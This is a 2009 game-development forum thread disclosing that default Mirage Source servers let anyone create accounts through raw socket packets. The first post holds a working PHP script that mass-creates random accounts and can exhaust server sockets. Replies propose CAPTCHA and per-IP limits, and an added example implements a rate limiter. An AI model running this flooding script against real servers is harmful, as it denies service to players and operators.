Mirage Source
http://miragesource.net/forums/

PHP Scripts. . . =(
http://miragesource.net/forums/viewtopic.php?f=193&t=5448

Author:  Cruzn [ Fri Apr 10, 2009 1:32 am ]
Post subject:  PHP Scripts. . . =(

Just so you guys know, the default MS4/MS3.0.3/etc. are all susceptible to malicious PHP scripts.

PHP Code: This scriptlet creates 51 accounts with randomly generated usernames. The password is static simply because I was lazy and this is only for demonstration purposes. It only takes a few seconds for this script to create 500 accounts. Basically, it's not super harmful to gameplay other than taking up one socket, using some bandwidth, and wasting space (but when you can buy 1TB hard drives, the account sizes are negligible). This script is for MS4, but simply change the packet sent to the server and it will work for all versions.
Code:
<?php
   /* Variables used in this script:
   -   $_socket      The socket variable.
   -   $_connection      The connection attempt variable.
   -   $_packet      The outgoing data variable.
   -   $_data      The incoming data variable.

   -   $_sc      SEP_CHAR
   -   $_ec      END_CHAR

   -   $username
   -   $password
   */

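   function random_username(){
      $username = ''; // Initialise before appending (avoids an undefined-variable warning).
      $length = rand(3, 14);
      for( $i = 1; $i <= $length; $i++ ){
         $username .= chr(rand(97, 122)); // Append a random lowercase letter (a-z).
      };

      return $username;
   };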

   for( $i = 0; $i <= 50; $i++ ){
      $username = random_username();
      $password = 'phpscript';

      if( $username != NULL && $password != NULL ){
         set_time_limit(0); // How long should this script run before it stops?

         $_socket = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP) or die(socket_strerror(socket_last_error())); // Create the socket.
         $_connection = @socket_connect($_socket, 'localhost', 7000) or die(socket_strerror(socket_last_error())); // Connect to server.

         $_sc = chr(0); // SEP_CHAR
         $_ec = chr(237); // END_CHAR

         // New Account Packet
         $_packet = 2 . $_sc . $username . $_sc . $password . $_ec; // Create the packet data.
         @socket_write($_socket, $_packet) or die(socket_strerror(socket_last_error()));

         if( $_data = @socket_read($_socket, 1024) ){
            $_data = explode($_sc, trim($_data, $_ec)); // Explode $_sc.
            $_data[1] = strtolower($_data[1]); // Discard all information except the message that was sent and put everything in lowercase (easier comparison).

            if( $_data[1] == 'your account has been created!' ){ // We received a message that the account was successfully created.
               echo 'Your account, (username: ' . $username . ', password: ' . $password . '), has been created.';
            }elseif( $_data[1] == 'sorry, that account name is already taken!' ){ // The requested username already exists.
               echo 'That account name is already taken.';
            }else{
               echo 'Unknown error.';
            };

            echo "<br>\r\n";
         };

         @socket_shutdown($_socket); // Shutdown the socket.         // or die(socket_strerror(socket_last_error()));
         @socket_close($_socket); // Close the socket.         // or die(socket_strerror(socket_last_error()));
      }else{
         echo 'No username/password specified.';
      };
   };
?>



Have fun.

Author:  ExoShox [ Fri Apr 10, 2009 1:52 am ]
Post subject:  Re: PHP Scripts. . . =(

I assume this teaches how to take a server out? (At least if you have more than one person doing this at once on different IPs/Computers)

Author:  Tony [ Fri Apr 10, 2009 1:53 am ]
Post subject:  Re: PHP Scripts. . . =(

Wow, so registration through browser is possible?

Author:  Pbcrazy [ Fri Apr 10, 2009 1:55 am ]
Post subject:  Re: PHP Scripts. . . =(

ummm.... i would guess so...

Author:  Dragoons Master [ Fri Apr 10, 2009 1:56 am ]
Post subject:  Re: PHP Scripts. . . =(

Change your server to sql based. Then make it only possible to create account from the website, then add a CAPTCHA. Fixed.

Author:  Cruzn [ Fri Apr 10, 2009 1:58 am ]
Post subject:  Re: PHP Scripts. . . =(

Senseika wrote:
I assume this teaches how to take a server out? (At least if you have more than one person doing this at once on different IPs/Computers)
Sure, a person could easily max out all the sockets on a single script. It wouldn't crash the server, but nobody would be able to connect.

Tony wrote:
Wow, so registration through browser is possible?
Code:
<?php
   /* Variables used in this script:
   -   $_dir      Directory to where the users' accounts are stored.
   -   $_filename      Filename of the user that is going to be created.
   -   $_handle      Opened file handle.
   -   $_data      The .ini file data.

   -   $username
   -   $password
   */

   $username = 'cruzn';
   $password = 'notcruzn';

   $_dir = 'C:\\Documents and Settings\\path\\to\\Accounts\\'; // Notice: TRAILING SLASH.
   $_filename = $username . '.ini'; // Filename of the user (simply the requested username with .ini at the end).

   if( file_exists($_dir) ){ // Make sure the directory we want exists.
      if( !file_exists($_dir . $_filename) ){ // Check to see if the file exists (failure = username already taken).
         if( $_handle = fopen($_dir . $_filename, "w") ){ // Username is free, open (and create) the user's .ini file.
            // This is all the data that will be put into the user's .ini file.
            $_data = '[GENERAL]
Login=' . $username . '
Password=' . $password . '
[CHAR1]
Class=1
Map=1
X=10
Y=6
[CHAR2]
Class=1
Map=1
X=10
Y=6
[CHAR3]
Class=1
Map=1
X=10
Y=6';

            fwrite($_handle, $_data) or die('Error writing to file.'); // Create the account by writing in all the data.
            fclose($_handle) or die; // Close the file.
         };
      }else{ // The account already exists.
         echo 'Account already exists.';
      };
   }else{
      echo 'Could not find the specified directory.';
   };
?>
Old code, and it's for Elysium, but yes -- you can register through a browser.


Also, an online script (again, old code and for Elysium):
Code:
<?php
   set_time_limit(2);

   $socket = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP); // Create the Socket
   $connection = @socket_connect($socket, "127.0.0.1", 4000); // Connect to server

   $message = "whosonline" . chr(0) . chr(237);
   @socket_write($socket, $message) or die("Could not write output.");

   $data = @socket_read($socket, 2046);
   list($packet, $data, $a) = explode(chr(0), $data);

   echo "1: " . $packet . " = \"" . $data . "\"";
   if( $packet == "PLAYERMSG" ){
      if( @preg_match('#There are (.*?) other players online:#', $data, $a) ){
         if( @preg_match('#There are ' . $a[1] . ' other players online: (.*).#', $data, $b) ){
            $players = explode(", ", $b[1]);
            foreach( $players as $id ){ // each() was removed in PHP 8; foreach iterates the same list.
               echo "Player:&nbsp;" . $id . "\n<br>";
               $message = "playerinforequest" . chr(0) . $id . chr(237);
               @socket_write($socket, $message) or die("Could not write output.");

               $data = @socket_read($socket, 2046);
               list($packet, $data) = explode(chr(0), $data);
               if( $packet == "PLAYERMSG" ){
                  echo $data . '<br>';
               };
            };
         };            
      }elseif( $data == "There are no other players online." ){
         @socket_close($socket);
         die('No players online.');
      }else{
         @socket_close($socket);
         die('Received incorrect data. "' . $data . '"');
      };
   };
?>

Author:  Tony [ Fri Apr 10, 2009 1:59 am ]
Post subject:  Re: PHP Scripts. . . =(

Dragoons Master wrote:
Change your server to sql based. Then make it only possible to create account from the website, then add a CAPTCHA. Fixed.


You make it sound so easy :\

Author:  Asrrin29 [ Fri Apr 10, 2009 2:41 am ]
Post subject:  Re: PHP Scripts. . . =(

I'm already a step ahead of you, lol.

Author:  Dragoons Master [ Fri Apr 10, 2009 4:20 am ]
Post subject:  Re: PHP Scripts. . . =(

Tony wrote:
Dragoons Master wrote:
Change your server to sql based. Then make it only possible to create account from the website, then add a CAPTCHA. Fixed.


You make it sound so easy :\

My game is already in mysql, so all I need is change the registration from the client to the browser.

Author:  Tony [ Fri Apr 10, 2009 6:40 am ]
Post subject:  Re: PHP Scripts. . . =(

So umm how's it unsafe if you can check if the packet came from your website?

Author:  Jacob [ Fri Apr 10, 2009 12:37 pm ]
Post subject:  Re: PHP Scripts. . . =(

You could be hardcore and limit the amount of accounts created per IP address.

Author:  phelpsy [ Fri Apr 10, 2009 7:35 pm ]
Post subject:  Re: PHP Scripts. . . =(

you could just limit an IP to making only two accounts per day, problem solved
or encrypt all the packets
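
Added example (not code from any poster in this thread or from Mirage Source): one way to apply the per-IP limit suggested above to the new-account packet format shown in the first post. The class and function names, the two-per-day threshold, the username pattern and the sample addresses are assumptions made for illustration.

```php
<?php
// Added example: per-IP limit on new-account packets (all names are hypothetical).
const SEP_CHAR = "\x00";   // chr(0), as in the thread's scripts
const END_CHAR = "\xED";   // chr(237)
const NEW_ACCOUNT = '2';   // MS4 new-account packet id used in the first post

final class AccountCreationLimiter
{
    /** @var array<string, int[]> creation timestamps per IP */
    private array $seen = [];

    public function __construct(private int $max = 2, private int $window = 86400) {}

    public function allow(string $ip, int $now): bool
    {
        // Keep only timestamps still inside the sliding window.
        $recent = array_values(array_filter(
            $this->seen[$ip] ?? [],
            fn (int $t): bool => $now - $t < $this->window
        ));
        $ok = count($recent) < $this->max;
        if ($ok) {
            $recent[] = $now;   // only accepted creations count against the quota
        }
        $this->seen[$ip] = $recent;
        return $ok;
    }
}

function handle_packet(AccountCreationLimiter $limiter, string $ip, string $raw, int $now): string
{
    $fields = explode(SEP_CHAR, rtrim($raw, END_CHAR));
    if ($fields[0] !== NEW_ACCOUNT) {
        return 'pass';          // not an account-creation packet
    }
    // The Elysium script above stores accounts as <name>.ini, so keep names to a safe alphabet.
    if (count($fields) !== 3 || !preg_match('/\A[A-Za-z0-9_]{3,14}\z/', $fields[1])) {
        return 'reject: malformed';
    }
    return $limiter->allow($ip, $now) ? 'create' : 'reject: rate limit';
}

// Constructed sample traffic: one address sends three requests within a minute.
$limiter = new AccountCreationLimiter();
$sample = [['203.0.113.5', 'abc', 0], ['203.0.113.5', 'def', 20], ['203.0.113.5', 'ghi', 40], ['198.51.100.7', 'jkl', 41]];
foreach ($sample as [$ip, $name, $t]) {
    $raw = NEW_ACCOUNT . SEP_CHAR . $name . SEP_CHAR . 'pw' . END_CHAR;
    echo $ip, ' ', $name, ' => ', handle_packet($limiter, $ip, $raw, $t), PHP_EOL;
}
```

The limiter only covers account creation; the socket exhaustion Cruzn describes needs a separate cap on concurrent connections per address. A real server would also persist the counters so a restart does not reset them.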

All times are UTC